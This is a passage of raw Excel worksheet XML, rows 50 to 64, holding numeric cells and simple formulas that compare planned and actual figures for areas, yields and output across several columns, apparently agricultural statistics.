      <c r="AO50" s="73">
        <f>O50/N50*100</f>
        <v>101.57654942988697</v>
      </c>
      <c r="AP50" s="74">
        <f>O50-M50</f>
        <v>-134.44999999999982</v>
      </c>
      <c r="AQ50" s="75"/>
    </row>
    <row r="51" spans="1:43" ht="22.5" customHeight="1">
      <c r="A51" s="92" t="s">
        <v>90</v>
      </c>
      <c r="B51" s="93" t="s">
        <v>16</v>
      </c>
      <c r="C51" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D51" s="89"/>
      <c r="E51" s="71"/>
      <c r="F51" s="89"/>
      <c r="G51" s="89"/>
      <c r="H51" s="89"/>
      <c r="I51" s="89"/>
      <c r="J51" s="89"/>
      <c r="K51" s="89"/>
      <c r="L51" s="89"/>
      <c r="M51" s="85"/>
      <c r="N51" s="98"/>
      <c r="O51" s="73"/>
      <c r="P51" s="11"/>
      <c r="Q51" s="12"/>
      <c r="R51" s="87"/>
      <c r="S51" s="12"/>
      <c r="T51" s="11"/>
      <c r="U51" s="12"/>
      <c r="V51" s="87"/>
      <c r="W51" s="12"/>
      <c r="X51" s="11"/>
      <c r="Y51" s="12"/>
      <c r="Z51" s="87"/>
      <c r="AA51" s="12"/>
      <c r="AB51" s="11"/>
      <c r="AC51" s="12"/>
      <c r="AD51" s="87"/>
      <c r="AE51" s="12"/>
      <c r="AF51" s="11"/>
      <c r="AG51" s="87"/>
      <c r="AH51" s="12"/>
      <c r="AI51" s="11"/>
      <c r="AJ51" s="87"/>
      <c r="AK51" s="12"/>
      <c r="AL51" s="11"/>
      <c r="AM51" s="87"/>
      <c r="AN51" s="87"/>
      <c r="AO51" s="87"/>
      <c r="AP51" s="74"/>
      <c r="AQ51" s="91"/>
    </row>
    <row r="52" spans="1:43" ht="22.5" customHeight="1">
      <c r="A52" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B52" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C52" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D52" s="89">
        <v>13</v>
      </c>
      <c r="E52" s="83">
        <v>13.2</v>
      </c>
      <c r="F52" s="89">
        <v>0</v>
      </c>
      <c r="G52" s="89">
        <v>3.1</v>
      </c>
      <c r="H52" s="89">
        <v>0</v>
      </c>
      <c r="I52" s="89">
        <v>0</v>
      </c>
      <c r="J52" s="89">
        <v>0</v>
      </c>
      <c r="K52" s="89">
        <v>5</v>
      </c>
      <c r="L52" s="89">
        <v>1.2</v>
      </c>
      <c r="M52" s="85">
        <v>6</v>
      </c>
      <c r="N52" s="98">
        <f>P52+T52+X52+AB52+AF52+AI52+AL52</f>
        <v>9.2999999999999989</v>
      </c>
      <c r="O52" s="86">
        <f>R52+V52+Z52+AD52+AG52+AJ52+AM52</f>
        <v>9.2999999999999989</v>
      </c>
      <c r="P52" s="11">
        <v>0</v>
      </c>
      <c r="Q52" s="12">
        <v>0</v>
      </c>
      <c r="R52" s="87"/>
      <c r="S52" s="12"/>
      <c r="T52" s="11">
        <v>3.1</v>
      </c>
      <c r="U52" s="12">
        <v>3.1</v>
      </c>
      <c r="V52" s="87">
        <v>3.1</v>
      </c>
      <c r="W52" s="12"/>
      <c r="X52" s="11">
        <v>0</v>
      </c>
      <c r="Y52" s="12">
        <v>0</v>
      </c>
      <c r="Z52" s="87"/>
      <c r="AA52" s="12"/>
      <c r="AB52" s="11">
        <v>0</v>
      </c>
      <c r="AC52" s="12"/>
      <c r="AD52" s="87"/>
      <c r="AE52" s="12"/>
      <c r="AF52" s="11">
        <v>0</v>
      </c>
      <c r="AG52" s="87"/>
      <c r="AH52" s="12"/>
      <c r="AI52" s="11">
        <v>5</v>
      </c>
      <c r="AJ52" s="87">
        <v>5</v>
      </c>
      <c r="AK52" s="12"/>
      <c r="AL52" s="11">
        <v>1.2</v>
      </c>
      <c r="AM52" s="87">
        <v>1.2</v>
      </c>
      <c r="AN52" s="87"/>
      <c r="AO52" s="87"/>
      <c r="AP52" s="74">
        <f>O52-M52</f>
        <v>3.2999999999999989</v>
      </c>
      <c r="AQ52" s="91"/>
    </row>
    <row r="53" spans="1:43" ht="22.5" customHeight="1">
      <c r="A53" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B53" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C53" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D53" s="89">
        <v>44</v>
      </c>
      <c r="E53" s="83">
        <f>E54/E52*10</f>
        <v>43.030303030303031</v>
      </c>
      <c r="F53" s="89">
        <v>0</v>
      </c>
      <c r="G53" s="89">
        <v>44</v>
      </c>
      <c r="H53" s="89"/>
      <c r="I53" s="89"/>
      <c r="J53" s="89">
        <v>0</v>
      </c>
      <c r="K53" s="89">
        <v>44</v>
      </c>
      <c r="L53" s="89">
        <v>40</v>
      </c>
      <c r="M53" s="85"/>
      <c r="N53" s="98">
        <f>N54/N52*10</f>
        <v>0</v>
      </c>
      <c r="O53" s="98">
        <f>O54/O52*10</f>
        <v>0</v>
      </c>
      <c r="P53" s="11">
        <v>0</v>
      </c>
      <c r="Q53" s="12">
        <v>0</v>
      </c>
      <c r="R53" s="87"/>
      <c r="S53" s="12"/>
      <c r="T53" s="11"/>
      <c r="U53" s="12"/>
      <c r="V53" s="87"/>
      <c r="W53" s="12"/>
      <c r="X53" s="11"/>
      <c r="Y53" s="12"/>
      <c r="Z53" s="87"/>
      <c r="AA53" s="12"/>
      <c r="AB53" s="11"/>
      <c r="AC53" s="12"/>
      <c r="AD53" s="87"/>
      <c r="AE53" s="12"/>
      <c r="AF53" s="11"/>
      <c r="AG53" s="87"/>
      <c r="AH53" s="12"/>
      <c r="AI53" s="11"/>
      <c r="AJ53" s="87"/>
      <c r="AK53" s="12"/>
      <c r="AL53" s="11"/>
      <c r="AM53" s="87"/>
      <c r="AN53" s="87"/>
      <c r="AO53" s="87"/>
      <c r="AP53" s="74"/>
      <c r="AQ53" s="91"/>
    </row>
    <row r="54" spans="1:43" ht="22.5" customHeight="1">
      <c r="A54" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B54" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C54" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D54" s="89">
        <v>59</v>
      </c>
      <c r="E54" s="83">
        <v>56.8</v>
      </c>
      <c r="F54" s="89">
        <f t="shared" ref="F54:L54" si="147">F53*F52/10</f>
        <v>0</v>
      </c>
      <c r="G54" s="89">
        <f t="shared" si="147"/>
        <v>13.64</v>
      </c>
      <c r="H54" s="89">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="I54" s="89">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="J54" s="89">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="K54" s="89">
        <f t="shared" si="147"/>
        <v>22</v>
      </c>
      <c r="L54" s="89">
        <f t="shared" si="147"/>
        <v>4.8</v>
      </c>
      <c r="M54" s="85"/>
      <c r="N54" s="98">
        <f>P54+T54+X54+AB54+AF54+AI54+AL54</f>
        <v>0</v>
      </c>
      <c r="O54" s="86">
        <f>R54+V54+Z54+AD54+AG54+AJ54+AM54</f>
        <v>0</v>
      </c>
      <c r="P54" s="11">
        <f>P53*P52/10</f>
        <v>0</v>
      </c>
      <c r="Q54" s="12">
        <v>0</v>
      </c>
      <c r="R54" s="87"/>
      <c r="S54" s="12"/>
      <c r="T54" s="11"/>
      <c r="U54" s="12"/>
      <c r="V54" s="87"/>
      <c r="W54" s="12"/>
      <c r="X54" s="11"/>
      <c r="Y54" s="12"/>
      <c r="Z54" s="87"/>
      <c r="AA54" s="12"/>
      <c r="AB54" s="11"/>
      <c r="AC54" s="12"/>
      <c r="AD54" s="87"/>
      <c r="AE54" s="12"/>
      <c r="AF54" s="11"/>
      <c r="AG54" s="87"/>
      <c r="AH54" s="12"/>
      <c r="AI54" s="11"/>
      <c r="AJ54" s="87"/>
      <c r="AK54" s="12"/>
      <c r="AL54" s="11"/>
      <c r="AM54" s="87"/>
      <c r="AN54" s="87"/>
      <c r="AO54" s="87"/>
      <c r="AP54" s="74"/>
      <c r="AQ54" s="91"/>
    </row>
    <row r="55" spans="1:43" ht="22.5" customHeight="1">
      <c r="A55" s="92" t="s">
        <v>91</v>
      </c>
      <c r="B55" s="93" t="s">
        <v>17</v>
      </c>
      <c r="C55" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D55" s="89"/>
      <c r="E55" s="71"/>
      <c r="F55" s="89"/>
      <c r="G55" s="89"/>
      <c r="H55" s="89"/>
      <c r="I55" s="89"/>
      <c r="J55" s="89"/>
      <c r="K55" s="89"/>
      <c r="L55" s="89"/>
      <c r="M55" s="85"/>
      <c r="N55" s="98"/>
      <c r="O55" s="73"/>
      <c r="P55" s="11"/>
      <c r="Q55" s="12"/>
      <c r="R55" s="73"/>
      <c r="S55" s="33"/>
      <c r="T55" s="11"/>
      <c r="U55" s="12"/>
      <c r="V55" s="73"/>
      <c r="W55" s="33"/>
      <c r="X55" s="11"/>
      <c r="Y55" s="12"/>
      <c r="Z55" s="73"/>
      <c r="AA55" s="33"/>
      <c r="AB55" s="11"/>
      <c r="AC55" s="12"/>
      <c r="AD55" s="73"/>
      <c r="AE55" s="33"/>
      <c r="AF55" s="11"/>
      <c r="AG55" s="73"/>
      <c r="AH55" s="33"/>
      <c r="AI55" s="11"/>
      <c r="AJ55" s="73"/>
      <c r="AK55" s="33"/>
      <c r="AL55" s="11"/>
      <c r="AM55" s="73"/>
      <c r="AN55" s="73"/>
      <c r="AO55" s="87"/>
      <c r="AP55" s="74"/>
      <c r="AQ55" s="91"/>
    </row>
    <row r="56" spans="1:43" ht="22.5" customHeight="1">
      <c r="A56" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B56" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C56" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D56" s="89">
        <v>4163</v>
      </c>
      <c r="E56" s="83">
        <v>4038</v>
      </c>
      <c r="F56" s="89">
        <f>220+9.9-0.3</f>
        <v>229.6</v>
      </c>
      <c r="G56" s="89">
        <f>790-9.1+11</f>
        <v>791.9</v>
      </c>
      <c r="H56" s="89">
        <f>890-7.95+5</f>
        <v>887.05</v>
      </c>
      <c r="I56" s="89">
        <f>582-44+25.4</f>
        <v>563.4</v>
      </c>
      <c r="J56" s="89">
        <f>928+5.6-20-1.7-0.2+13.82</f>
        <v>925.52</v>
      </c>
      <c r="K56" s="89">
        <f>410+8.1+0.9-23.1-60.23+16+14.5</f>
        <v>366.16999999999996</v>
      </c>
      <c r="L56" s="89">
        <f>222</f>
        <v>222</v>
      </c>
      <c r="M56" s="90">
        <v>3920.78</v>
      </c>
      <c r="N56" s="98">
        <f>P56+T56+X56+AB56+AF56+AI56+AL56</f>
        <v>3724.1699999999996</v>
      </c>
      <c r="O56" s="86">
        <f>R56+V56+Z56+AD56+AG56+AJ56+AM56</f>
        <v>3783.03</v>
      </c>
      <c r="P56" s="11">
        <f>229.6-11</f>
        <v>218.6</v>
      </c>
      <c r="Q56" s="12">
        <v>229.6</v>
      </c>
      <c r="R56" s="87">
        <v>218.6</v>
      </c>
      <c r="S56" s="33"/>
      <c r="T56" s="11">
        <f>780.9+0.15-4-19</f>
        <v>758.05</v>
      </c>
      <c r="U56" s="12">
        <v>791.9</v>
      </c>
      <c r="V56" s="87">
        <f>758.05+10.85</f>
        <v>768.9</v>
      </c>
      <c r="W56" s="33"/>
      <c r="X56" s="11">
        <f>882.05-25-5-17</f>
        <v>835.05</v>
      </c>
      <c r="Y56" s="12">
        <v>887.05</v>
      </c>
      <c r="Z56" s="87">
        <f>835.05+30</f>
        <v>865.05</v>
      </c>
      <c r="AA56" s="12"/>
      <c r="AB56" s="11">
        <f>538-5-1-21</f>
        <v>511</v>
      </c>
      <c r="AC56" s="12"/>
      <c r="AD56" s="87">
        <f>511</f>
        <v>511</v>
      </c>
      <c r="AE56" s="12">
        <f>AD56-I56</f>
        <v>-52.399999999999977</v>
      </c>
      <c r="AF56" s="11">
        <f>911.7-6-19</f>
        <v>886.7</v>
      </c>
      <c r="AG56" s="87">
        <f>925.52-8.82-22.03</f>
        <v>894.67</v>
      </c>
      <c r="AH56" s="12">
        <f>AG56-J56</f>
        <v>-30.850000000000023</v>
      </c>
      <c r="AI56" s="11">
        <f>351.67-26.9-3-13</f>
        <v>308.77000000000004</v>
      </c>
      <c r="AJ56" s="87">
        <f>308.77+41.4-31.36</f>
        <v>318.80999999999995</v>
      </c>
      <c r="AK56" s="12">
        <f>AJ56-K56</f>
        <v>-47.360000000000014</v>
      </c>
      <c r="AL56" s="11">
        <f>222-4-12</f>
        <v>206</v>
      </c>
      <c r="AM56" s="87">
        <f>206</f>
        <v>206</v>
      </c>
      <c r="AN56" s="87">
        <f>AM56-L56</f>
        <v>-16</v>
      </c>
      <c r="AO56" s="73">
        <f>O56/N56*100</f>
        <v>101.5804863902561</v>
      </c>
      <c r="AP56" s="74">
        <f>O56-M56</f>
        <v>-137.75</v>
      </c>
      <c r="AQ56" s="91"/>
    </row>
    <row r="57" spans="1:43" ht="22.5" customHeight="1">
      <c r="A57" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B57" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C57" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D57" s="89">
        <v>0</v>
      </c>
      <c r="E57" s="83">
        <f>E58/E56*10</f>
        <v>74.638434868746913</v>
      </c>
      <c r="F57" s="89">
        <v>87</v>
      </c>
      <c r="G57" s="89">
        <v>110</v>
      </c>
      <c r="H57" s="89">
        <v>100</v>
      </c>
      <c r="I57" s="89">
        <v>88</v>
      </c>
      <c r="J57" s="89">
        <v>90</v>
      </c>
      <c r="K57" s="89">
        <v>97</v>
      </c>
      <c r="L57" s="89">
        <v>86</v>
      </c>
      <c r="M57" s="85"/>
      <c r="N57" s="98">
        <f>N58/N56*10</f>
        <v>5.1066949145715697</v>
      </c>
      <c r="O57" s="86">
        <f>O58/O56*10</f>
        <v>0</v>
      </c>
      <c r="P57" s="11">
        <v>87</v>
      </c>
      <c r="Q57" s="12">
        <v>87</v>
      </c>
      <c r="R57" s="87"/>
      <c r="S57" s="12"/>
      <c r="T57" s="11"/>
      <c r="U57" s="12"/>
      <c r="V57" s="87"/>
      <c r="W57" s="12"/>
      <c r="X57" s="11"/>
      <c r="Y57" s="12"/>
      <c r="Z57" s="87"/>
      <c r="AA57" s="12"/>
      <c r="AB57" s="11"/>
      <c r="AC57" s="12"/>
      <c r="AD57" s="87"/>
      <c r="AE57" s="12"/>
      <c r="AF57" s="11"/>
      <c r="AG57" s="87"/>
      <c r="AH57" s="12"/>
      <c r="AI57" s="11"/>
      <c r="AJ57" s="87"/>
      <c r="AK57" s="12"/>
      <c r="AL57" s="11"/>
      <c r="AM57" s="87"/>
      <c r="AN57" s="87"/>
      <c r="AO57" s="87"/>
      <c r="AP57" s="74"/>
      <c r="AQ57" s="91"/>
    </row>
    <row r="58" spans="1:43" ht="22.5" customHeight="1">
      <c r="A58" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B58" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C58" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D58" s="89">
        <v>0</v>
      </c>
      <c r="E58" s="83">
        <v>30139</v>
      </c>
      <c r="F58" s="89">
        <f t="shared" ref="F58:G58" si="148">F57*F56/10</f>
        <v>1997.52</v>
      </c>
      <c r="G58" s="89">
        <f t="shared" si="148"/>
        <v>8710.9</v>
      </c>
      <c r="H58" s="89">
        <f t="shared" ref="H58:L58" si="149">H57*H56/10</f>
        <v>8870.5</v>
      </c>
      <c r="I58" s="89">
        <f t="shared" si="149"/>
        <v>4957.92</v>
      </c>
      <c r="J58" s="89">
        <f t="shared" si="149"/>
        <v>8329.68</v>
      </c>
      <c r="K58" s="89">
        <f t="shared" si="149"/>
        <v>3551.8489999999997</v>
      </c>
      <c r="L58" s="89">
        <f t="shared" si="149"/>
        <v>1909.2</v>
      </c>
      <c r="M58" s="85"/>
      <c r="N58" s="98">
        <f>P58+T58+X58+AB58+AF58+AI58+AL58</f>
        <v>1901.8200000000002</v>
      </c>
      <c r="O58" s="86">
        <f>R58+V58+Z58+AD58+AG58+AJ58+AM58</f>
        <v>0</v>
      </c>
      <c r="P58" s="11">
        <f t="shared" ref="P58" si="150">P57*P56/10</f>
        <v>1901.8200000000002</v>
      </c>
      <c r="Q58" s="12">
        <v>1997.52</v>
      </c>
      <c r="R58" s="87"/>
      <c r="S58" s="12"/>
      <c r="T58" s="11"/>
      <c r="U58" s="12"/>
      <c r="V58" s="87"/>
      <c r="W58" s="12"/>
      <c r="X58" s="11"/>
      <c r="Y58" s="12"/>
      <c r="Z58" s="87"/>
      <c r="AA58" s="12"/>
      <c r="AB58" s="11"/>
      <c r="AC58" s="12"/>
      <c r="AD58" s="87"/>
      <c r="AE58" s="12"/>
      <c r="AF58" s="11"/>
      <c r="AG58" s="87"/>
      <c r="AH58" s="12"/>
      <c r="AI58" s="11"/>
      <c r="AJ58" s="87"/>
      <c r="AK58" s="12"/>
      <c r="AL58" s="11"/>
      <c r="AM58" s="87"/>
      <c r="AN58" s="87"/>
      <c r="AO58" s="87"/>
      <c r="AP58" s="74"/>
      <c r="AQ58" s="91"/>
    </row>
    <row r="59" spans="1:43" ht="22.5" customHeight="1">
      <c r="A59" s="76">
        <v>4</v>
      </c>
      <c r="B59" s="24" t="s">
        <v>66</v>
      </c>
      <c r="C59" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D59" s="70">
        <v>242</v>
      </c>
      <c r="E59" s="71">
        <f>E61+E65</f>
        <v>249.6</v>
      </c>
      <c r="F59" s="70">
        <f t="shared" ref="F59:H59" si="151">F61+F65</f>
        <v>24</v>
      </c>
      <c r="G59" s="70">
        <f t="shared" si="151"/>
        <v>42</v>
      </c>
      <c r="H59" s="70">
        <f t="shared" si="151"/>
        <v>24</v>
      </c>
      <c r="I59" s="70">
        <f t="shared" ref="I59:L59" si="152">I61+I65</f>
        <v>43</v>
      </c>
      <c r="J59" s="70">
        <f t="shared" si="152"/>
        <v>41</v>
      </c>
      <c r="K59" s="70">
        <f t="shared" si="152"/>
        <v>17.100000000000001</v>
      </c>
      <c r="L59" s="70">
        <f t="shared" si="152"/>
        <v>27</v>
      </c>
      <c r="M59" s="77">
        <f>M61+M65</f>
        <v>210</v>
      </c>
      <c r="N59" s="191">
        <f>N61+N65</f>
        <v>218.1</v>
      </c>
      <c r="O59" s="73">
        <f>O61+O65</f>
        <v>218.1</v>
      </c>
      <c r="P59" s="32">
        <f t="shared" ref="P59" si="153">P61+P65</f>
        <v>24</v>
      </c>
      <c r="Q59" s="33">
        <v>24</v>
      </c>
      <c r="R59" s="79">
        <f t="shared" ref="R59:T59" si="154">R61+R65</f>
        <v>24</v>
      </c>
      <c r="S59" s="33">
        <f>R59-Q59</f>
        <v>0</v>
      </c>
      <c r="T59" s="32">
        <f t="shared" si="154"/>
        <v>42</v>
      </c>
      <c r="U59" s="33">
        <v>42</v>
      </c>
      <c r="V59" s="79">
        <f t="shared" ref="V59:X59" si="155">V61+V65</f>
        <v>42</v>
      </c>
      <c r="W59" s="35"/>
      <c r="X59" s="32">
        <f t="shared" si="155"/>
        <v>24</v>
      </c>
      <c r="Y59" s="33">
        <v>24</v>
      </c>
      <c r="Z59" s="79">
        <f t="shared" ref="Z59:AB59" si="156">Z61+Z65</f>
        <v>24</v>
      </c>
      <c r="AA59" s="35"/>
      <c r="AB59" s="32">
        <f t="shared" si="156"/>
        <v>43</v>
      </c>
      <c r="AC59" s="33"/>
      <c r="AD59" s="79">
        <f t="shared" ref="AD59:AF59" si="157">AD61+AD65</f>
        <v>43</v>
      </c>
      <c r="AE59" s="35"/>
      <c r="AF59" s="32">
        <f t="shared" si="157"/>
        <v>41</v>
      </c>
      <c r="AG59" s="79">
        <f t="shared" ref="AG59:AI59" si="158">AG61+AG65</f>
        <v>41</v>
      </c>
      <c r="AH59" s="35"/>
      <c r="AI59" s="32">
        <f t="shared" si="158"/>
        <v>17.100000000000001</v>
      </c>
      <c r="AJ59" s="79">
        <f t="shared" ref="AJ59:AL59" si="159">AJ61+AJ65</f>
        <v>17.100000000000001</v>
      </c>
      <c r="AK59" s="35"/>
      <c r="AL59" s="32">
        <f t="shared" si="159"/>
        <v>27</v>
      </c>
      <c r="AM59" s="79">
        <f t="shared" ref="AM59" si="160">AM61+AM65</f>
        <v>27</v>
      </c>
      <c r="AN59" s="79"/>
      <c r="AO59" s="73">
        <f>O59/N59*100</f>
        <v>100</v>
      </c>
      <c r="AP59" s="74">
        <f>O59-M59</f>
        <v>8.0999999999999943</v>
      </c>
      <c r="AQ59" s="80"/>
    </row>
    <row r="60" spans="1:43" ht="22.5" customHeight="1">
      <c r="A60" s="92" t="s">
        <v>92</v>
      </c>
      <c r="B60" s="93" t="s">
        <v>18</v>
      </c>
      <c r="C60" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D60" s="89"/>
      <c r="E60" s="71"/>
      <c r="F60" s="89"/>
      <c r="G60" s="89"/>
      <c r="H60" s="89"/>
      <c r="I60" s="89"/>
      <c r="J60" s="89"/>
      <c r="K60" s="89"/>
      <c r="L60" s="89"/>
      <c r="M60" s="85"/>
      <c r="N60" s="98"/>
      <c r="O60" s="73"/>
      <c r="P60" s="11"/>
      <c r="Q60" s="12"/>
      <c r="R60" s="87"/>
      <c r="S60" s="12"/>
      <c r="T60" s="11"/>
      <c r="U60" s="12"/>
      <c r="V60" s="87"/>
      <c r="W60" s="12"/>
      <c r="X60" s="11"/>
      <c r="Y60" s="12"/>
      <c r="Z60" s="87"/>
      <c r="AA60" s="12"/>
      <c r="AB60" s="11"/>
      <c r="AC60" s="12"/>
      <c r="AD60" s="87"/>
      <c r="AE60" s="12"/>
      <c r="AF60" s="11"/>
      <c r="AG60" s="87"/>
      <c r="AH60" s="12"/>
      <c r="AI60" s="11"/>
      <c r="AJ60" s="87"/>
      <c r="AK60" s="12"/>
      <c r="AL60" s="11"/>
      <c r="AM60" s="87"/>
      <c r="AN60" s="87"/>
      <c r="AO60" s="87"/>
      <c r="AP60" s="74"/>
      <c r="AQ60" s="91"/>
    </row>
    <row r="61" spans="1:43" ht="22.5" customHeight="1">
      <c r="A61" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B61" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C61" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D61" s="89">
        <v>136</v>
      </c>
      <c r="E61" s="83">
        <v>145</v>
      </c>
      <c r="F61" s="89">
        <v>15</v>
      </c>
      <c r="G61" s="89">
        <v>25</v>
      </c>
      <c r="H61" s="89">
        <v>14</v>
      </c>
      <c r="I61" s="89">
        <v>23</v>
      </c>
      <c r="J61" s="89">
        <v>22</v>
      </c>
      <c r="K61" s="89">
        <v>8.1</v>
      </c>
      <c r="L61" s="89">
        <v>19</v>
      </c>
      <c r="M61" s="85">
        <v>120</v>
      </c>
      <c r="N61" s="98">
        <f>P61+T61+X61+AB61+AF61+AI61+AL61</f>
        <v>126.1</v>
      </c>
      <c r="O61" s="86">
        <f>R61+V61+Z61+AD61+AG61+AJ61+AM61</f>
        <v>126.1</v>
      </c>
      <c r="P61" s="11">
        <v>15</v>
      </c>
      <c r="Q61" s="12">
        <v>15</v>
      </c>
      <c r="R61" s="87">
        <f>15</f>
        <v>15</v>
      </c>
      <c r="S61" s="12"/>
      <c r="T61" s="11">
        <v>25</v>
      </c>
      <c r="U61" s="12">
        <v>25</v>
      </c>
      <c r="V61" s="87">
        <f>25-0</f>
        <v>25</v>
      </c>
      <c r="W61" s="12"/>
      <c r="X61" s="11">
        <v>14</v>
      </c>
      <c r="Y61" s="12">
        <v>14</v>
      </c>
      <c r="Z61" s="87">
        <f>14-0</f>
        <v>14</v>
      </c>
      <c r="AA61" s="12"/>
      <c r="AB61" s="11">
        <v>23</v>
      </c>
      <c r="AC61" s="12"/>
      <c r="AD61" s="87">
        <f>23-0</f>
        <v>23</v>
      </c>
      <c r="AE61" s="12"/>
      <c r="AF61" s="11">
        <v>22</v>
      </c>
      <c r="AG61" s="87">
        <f>22-0</f>
        <v>22</v>
      </c>
      <c r="AH61" s="12"/>
      <c r="AI61" s="11">
        <v>8.1</v>
      </c>
      <c r="AJ61" s="87">
        <f>8.1-0</f>
        <v>8.1</v>
      </c>
      <c r="AK61" s="12"/>
      <c r="AL61" s="11">
        <v>19</v>
      </c>
      <c r="AM61" s="87">
        <f>19-0</f>
        <v>19</v>
      </c>
      <c r="AN61" s="87"/>
      <c r="AO61" s="73">
        <f>O61/N61*100</f>
        <v>100</v>
      </c>
      <c r="AP61" s="74">
        <f>O61-M61</f>
        <v>6.0999999999999943</v>
      </c>
      <c r="AQ61" s="91"/>
    </row>
    <row r="62" spans="1:43" ht="22.5" customHeight="1">
      <c r="A62" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B62" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C62" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D62" s="89">
        <v>19</v>
      </c>
      <c r="E62" s="83">
        <v>17.986206896551725</v>
      </c>
      <c r="F62" s="89">
        <v>17</v>
      </c>
      <c r="G62" s="89">
        <v>21</v>
      </c>
      <c r="H62" s="89">
        <v>17</v>
      </c>
      <c r="I62" s="89">
        <v>18</v>
      </c>
      <c r="J62" s="89">
        <v>22</v>
      </c>
      <c r="K62" s="89">
        <v>22</v>
      </c>
      <c r="L62" s="89">
        <v>17</v>
      </c>
      <c r="M62" s="85">
        <f>M63/M61*10</f>
        <v>20.554166666666667</v>
      </c>
      <c r="N62" s="98">
        <f>N63/N61*10</f>
        <v>2.0222045995241871</v>
      </c>
      <c r="O62" s="86">
        <f>O63/O61*10</f>
        <v>0</v>
      </c>
      <c r="P62" s="11">
        <v>17</v>
      </c>
      <c r="Q62" s="12">
        <v>17</v>
      </c>
      <c r="R62" s="87"/>
      <c r="S62" s="12"/>
      <c r="T62" s="11"/>
      <c r="U62" s="12"/>
      <c r="V62" s="87"/>
      <c r="W62" s="12"/>
      <c r="X62" s="11"/>
      <c r="Y62" s="12"/>
      <c r="Z62" s="87"/>
      <c r="AA62" s="12"/>
      <c r="AB62" s="11"/>
      <c r="AC62" s="12"/>
      <c r="AD62" s="87"/>
      <c r="AE62" s="12"/>
      <c r="AF62" s="11"/>
      <c r="AG62" s="87"/>
      <c r="AH62" s="12"/>
      <c r="AI62" s="11"/>
      <c r="AJ62" s="87"/>
      <c r="AK62" s="12"/>
      <c r="AL62" s="11"/>
      <c r="AM62" s="87"/>
      <c r="AN62" s="87"/>
      <c r="AO62" s="87"/>
      <c r="AP62" s="74"/>
      <c r="AQ62" s="91"/>
    </row>
    <row r="63" spans="1:43" ht="22.5" customHeight="1">
      <c r="A63" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B63" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C63" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D63" s="89">
        <v>264</v>
      </c>
      <c r="E63" s="83">
        <v>260.8</v>
      </c>
      <c r="F63" s="89">
        <f t="shared" ref="F63:L63" si="161">F62*F61/10</f>
        <v>25.5</v>
      </c>
      <c r="G63" s="89">
        <f t="shared" si="161"/>
        <v>52.5</v>
      </c>
      <c r="H63" s="89">
        <f t="shared" si="161"/>
        <v>23.8</v>
      </c>
      <c r="I63" s="89">
        <f t="shared" si="161"/>
        <v>41.4</v>
      </c>
      <c r="J63" s="89">
        <f t="shared" si="161"/>
        <v>48.4</v>
      </c>
      <c r="K63" s="89">
        <f t="shared" si="161"/>
        <v>17.82</v>
      </c>
      <c r="L63" s="89">
        <f t="shared" si="161"/>
        <v>32.299999999999997</v>
      </c>
      <c r="M63" s="90">
        <v>246.65</v>
      </c>
      <c r="N63" s="98">
        <f>P63+T63+X63+AB63+AF63+AI63+AL63</f>
        <v>25.5</v>
      </c>
      <c r="O63" s="86">
        <f>R63+V63+Z63+AD63+AG63+AJ63+AM63</f>
        <v>0</v>
      </c>
      <c r="P63" s="11">
        <f t="shared" ref="P63" si="162">P62*P61/10</f>
        <v>25.5</v>
      </c>
      <c r="Q63" s="12">
        <v>25.5</v>
      </c>
      <c r="R63" s="87"/>
      <c r="S63" s="12"/>
      <c r="T63" s="11"/>
      <c r="U63" s="12"/>
      <c r="V63" s="87"/>
      <c r="W63" s="12"/>
      <c r="X63" s="11"/>
      <c r="Y63" s="12"/>
      <c r="Z63" s="87"/>
      <c r="AA63" s="12"/>
      <c r="AB63" s="11"/>
      <c r="AC63" s="12"/>
      <c r="AD63" s="87"/>
      <c r="AE63" s="12"/>
      <c r="AF63" s="11"/>
      <c r="AG63" s="87"/>
      <c r="AH63" s="12"/>
      <c r="AI63" s="11"/>
      <c r="AJ63" s="87"/>
      <c r="AK63" s="12"/>
      <c r="AL63" s="11"/>
      <c r="AM63" s="87"/>
      <c r="AN63" s="87"/>
      <c r="AO63" s="87"/>
      <c r="AP63" s="74"/>
      <c r="AQ63" s="91"/>
    </row>
    <row r="64" spans="1:43" ht="22.5" customHeight="1">
      <c r="A64" s="92" t="s">
        <v>93</v>
      </c>
      <c r="B64" s="93" t="s">
        <v>19</v>
      </c>
      <c r="C64" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D64" s="89"/>
      <c r="E64" s="71"/>
      <c r="F64" s="89"/>
      <c r="G64" s="89"/>
      <c r="H64" s="89"/>
      <c r="I64" s="89"/>
      <c r="J64" s="89"/>
      <c r="K64" s="89"/>
      <c r="L64" s="89"/>
      <c r="M64" s="85"/>
      <c r="N64" s="98"/>
      <c r="O64" s="73"/>
      <c r="P64" s="11"/>
      <c r="Q64" s="12"/>
